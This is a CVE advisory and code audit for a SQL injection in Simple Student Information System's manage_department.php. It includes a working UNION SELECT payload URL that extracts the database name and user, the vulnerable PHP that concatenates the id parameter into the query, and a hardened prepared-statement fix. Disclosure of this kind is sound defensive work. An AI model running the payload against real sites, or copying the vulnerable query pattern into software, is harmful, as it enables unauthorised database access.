Headline
CVE-2022-2705: PHP Code Audit: Simple Student Information System SQL Injection
A vulnerability was found in SourceCodester Simple Student Information System. It has been rated as critical. This issue affects some unknown processing of the file admin/departments/manage_department.php. The manipulation of the argument id with the input -5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20- leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205829 was assigned to this vulnerability.
Vendor Homepage:
https://www.sourcecodester.com
Source Code Download:
Simple Student Information System
Payload
Simple Student Information System SQL Injection
http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20-
Source Code Analysis
admin/departments/manage_department.php, lines 1-13:
As the code shows, the id parameter is read with the GET method and concatenated directly into the SQL statement without any filtering, which causes the SQL injection vulnerability.
<?php
require_once('../../config.php');
if(isset($_GET['id'])){
    // $_GET['id'] is interpolated straight into the query text with no
    // validation or escaping, so the request controls part of the SQL.
    $qry = $conn->query("SELECT * FROM `department_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        // Every column of the matched row becomes a PHP variable named after
        // the column; the numeric indices fetch_array() also returns are skipped.
        foreach($res as $k => $v){
            if(!is_numeric($k))
                $$k = $v;
        }
    }
}
?>
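For comparison, a hardened version of the same lookup, added here as an example and not taken from the project's code. It assumes $conn is the mysqli connection that config.php creates, as in the original, and that the mysqlnd get_result() method is available:

```php
<?php
// Added example (not the project's own code): hardened replacement for the
// vulnerable lookup in admin/departments/manage_department.php.
// Assumption: $conn is the mysqli connection created by ../../config.php.
require_once('../../config.php');

if (isset($_GET['id'])) {
    // Department ids are integers; reject anything else before the query runs.
    // A UNION payload such as -5756' UNION ALL SELECT ... fails this check.
    $id = filter_var($_GET['id'], FILTER_VALIDATE_INT);
    if ($id === false) {
        http_response_code(400);
        exit('Invalid department id');
    }

    // Parameterised query: the id is sent as a bound value, never as SQL text,
    // so even a value that passed validation cannot change the statement.
    $stmt = $conn->prepare('SELECT * FROM `department_list` WHERE id = ?');
    if ($stmt === false) {
        http_response_code(500);
        exit('Query preparation failed');
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $res = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($res) {
        // Kept from the original so the rest of the page keeps working:
        // each column becomes a variable named after it. fetch_assoc() returns
        // no numeric keys, so the is_numeric() filter is no longer needed.
        foreach ($res as $k => $v) {
            $$k = $v;
        }
    }
}
?>
```

The integer check alone would stop the published payload, but the prepared statement is the actual fix: it holds even if the column type or the validation rule changes later.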